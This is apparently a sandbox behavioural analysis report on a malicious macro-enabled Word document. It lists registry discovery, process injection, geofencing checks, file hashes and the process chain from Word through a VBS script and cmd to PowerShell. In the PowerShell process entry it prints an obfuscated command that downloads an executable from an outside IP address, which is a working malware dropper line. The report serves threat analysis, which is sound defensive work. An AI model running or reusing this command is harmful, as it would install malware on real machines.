Behavioral Report

max time kernel87s
max time network143s
platformwindows10-2004_x64
resourcewin10v2004-20220414-en
submitted21-05-2022 12:14

Report
Files
Registry
Network
Processes
Mutex
Misc

Target

cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm

Filesize

89KB

Completed

21-05-2022 12:29

Task

behavioral2

Score

10^/10

MD5

b52f6306e6c5af7bd87fab6f32a937b9

SHA1

e7043e9907b332b9039eeb4487959d10e05d2dc0

SHA256

cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4

SHA256

0f5212be7b3294cb4b86e4f884f9b750a056c34ab9d9df040481d2244659ee2c79c084747ed5cf056ae9d4d3d35563b1901dacfbec464a20ea466029916cc9cb

Extracted

Language	ps1
Deobfuscated
URLs	http://62.108.35.164/api.php exe.dropper http://62.108.35.164/api.php

Discovery

Process spawned unexpected child process

explorer.exe

Description

This typically indicates the parent process was compromised via an exploit or macro.

Reported IOCs

description	pid	pid_target	process	target process
Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process	4004	3488	explorer.exe	WINWORD.EXE

Blocklisted process makes network request
powershell.exe

Reported IOCs

flow pid process

48 3596 powershell.exe

flow	pid	process
48	3596	powershell.exe

Checks computer location settings

WScript.exe

Description

Looks up country code configured in the registry, likely geofence.

TTPs

Query RegistrySystem Information Discovery

Reported IOCs

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	WScript.exe

Enumerates physical storage devices

Description

Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

TTPs

System Information Discovery

Checks processor information in registry

WINWORD.EXE

Description

Processor information is often read in order to detect sandboxing environments.

TTPs

Query RegistrySystem Information Discovery

Reported IOCs

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	WINWORD.EXE

Delays execution with timeout.exe
timeout.exe

Tags

evasion

Reported IOCs

pid process

1652 timeout.exe

pid	process
1652	timeout.exe

Enumerates system info in registry

WINWORD.EXE

TTPs

Query RegistrySystem Information Discovery

Reported IOCs

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	WINWORD.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	WINWORD.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	WINWORD.EXE

Modifies registry class
explorer.exe

Reported IOCs

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings explorer.exe
Suspicious behavior: AddClipboardFormatListener
WINWORD.EXE

Reported IOCs

pid process

3488 WINWORD.EXE
3488 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses
powershell.exe

Reported IOCs

pid process

3596 powershell.exe
3596 powershell.exe
Suspicious use of AdjustPrivilegeToken
powershell.exe

Reported IOCs

description pid process

Token: SeDebugPrivilege 3596 powershell.exe
Suspicious use of SetWindowsHookEx
WINWORD.EXE

Reported IOCs

pid process

3488 WINWORD.EXE
3488 WINWORD.EXE
3488 WINWORD.EXE
3488 WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings	explorer.exe

pid	process
3488	WINWORD.EXE
3488	WINWORD.EXE

pid	process
3596	powershell.exe
3596	powershell.exe

description	pid	process
Token: SeDebugPrivilege	3596	powershell.exe

pid	process
3488	WINWORD.EXE
3488	WINWORD.EXE
3488	WINWORD.EXE
3488	WINWORD.EXE

Suspicious use of WriteProcessMemory

WINWORD.EXEexplorer.exeWScript.execmd.exe

Reported IOCs

description	pid	process	target process
PID 3488 wrote to memory of 4004	3488	WINWORD.EXE	explorer.exe
PID 3488 wrote to memory of 4004	3488	WINWORD.EXE	explorer.exe
PID 100 wrote to memory of 3796	100	explorer.exe	WScript.exe
PID 100 wrote to memory of 3796	100	explorer.exe	WScript.exe
PID 3796 wrote to memory of 760	3796	WScript.exe	cmd.exe
PID 3796 wrote to memory of 760	3796	WScript.exe	cmd.exe
PID 760 wrote to memory of 3596	760	cmd.exe	powershell.exe
PID 760 wrote to memory of 3596	760	cmd.exe	powershell.exe
PID 760 wrote to memory of 1652	760	cmd.exe	timeout.exe
PID 760 wrote to memory of 1652	760	cmd.exe	timeout.exe

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm" /o ""

Checks processor information in registry
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory

PID:3488

C:\Windows\explorer.exe

explorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs

Process spawned unexpected child process

PID:4004

C:\Windows\explorer.exe

C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding

Modifies registry class
Suspicious use of WriteProcessMemory

PID:100

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"

Checks computer location settings
Suspicious use of WriteProcessMemory

PID:3796

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd" "

Suspicious use of WriteProcessMemory

PID:760

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

POWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://62.108.35.164/api.php', 'C:\AsusSupport\Kilskhdeuyrg.exe')

Blocklisted process makes network request
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken

PID:3596

C:\Windows\system32\timeout.exe

TIMEOUT /T 10

Delays execution with timeout.exe

PID:1652

Collection

Command and Control

Credential Access

Defense Evasion

Discovery

Execution

Exfiltration

Impact

Initial Access

Lateral Movement

Persistence

Privilege Escalation

00:00 00:00

C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd
MD5
197fd11428deaf8779c40b8aee37c023

SHA1
66d053c6349a994301ba6ec562c7e659f6e60e40

SHA256
7ede0b864739e9a03678ef876fb0b218b87a7d15f89b2a280989024b739deaf8

SHA512
ab9b7ad1502532ed065bfa4bcc9e559d3a92bc9be3b46d24b1ba5a32ff7f58f7afa7431314435f434e025f36a8b4272d2a5a3ee4fbfdbeae560f809f978fcfc4

Download Submit
C:\ProgramData\OIUTFuy
MD5
12a0751c89b3b618b7c91cee7a231878

SHA1
2d546c942a6626826dc1d76d752cb6bb67546a94

SHA256
c9a5966dac467eaafd2848273ad734127ba965224225a7e56a02113a1af571bc

SHA512
aab37a468a8ade701a7c21042df0bca8f58c37223dbf2709285cac863a16b98085f66bd9add1c2480cbdf86781671f1589e4f37b472398de02b1d9dde8ee5fd3

Download Submit
C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
MD5
d940788959fad6d9ec52674997f04457

SHA1
c784384517d2c206c5423a8d58dee5d9ca9c6ffb

SHA256
46b2da0c04f3b7edb5ab3c1280904dbc645fca003e80a3390e483bde1b80a646

SHA512
802359aade02f39171298dd57dec02943af22aef5105c9e8e91959b71072258b3e2eff75eda0996c04ab7704ba829ec776f1a6f9673b95cf35a860a7859d5430

Download Submit
memory/760-146-0x0000000000000000-mapping.dmp

Download
memory/1652-151-0x0000000000000000-mapping.dmp

Download
memory/3488-137-0x000001609A390000-0x000001609A394000-memory.dmp

Download
memory/3488-136-0x00007FF823B00000-0x00007FF823B10000-memory.dmp

Download
memory/3488-135-0x00007FF823B00000-0x00007FF823B10000-memory.dmp

Download
memory/3488-134-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

Download
memory/3488-133-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

Download
memory/3488-132-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

Download
memory/3488-131-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

Download
memory/3488-143-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

Download
memory/3488-144-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

Download
memory/3488-145-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

Download
memory/3488-142-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

Download
memory/3488-130-0x00007FF8262B0000-0x00007FF8262C0000-memory.dmp

Download
memory/3596-148-0x0000000000000000-mapping.dmp

Download
memory/3596-149-0x0000025977970000-0x0000025977992000-memory.dmp

Download
memory/3596-150-0x00007FF847690000-0x00007FF848151000-memory.dmp

Download
memory/3796-140-0x0000000000000000-mapping.dmp

Download
memory/4004-138-0x0000000000000000-mapping.dmp

Download

Extracted

Filter: none

Description

Reported IOCs

Reported IOCs

Description

TTPs

Reported IOCs

Description

TTPs

Description

TTPs

Reported IOCs

Tags

Reported IOCs

TTPs

Reported IOCs

Reported IOCs

Reported IOCs

Reported IOCs

Reported IOCs

Reported IOCs

Reported IOCs

Title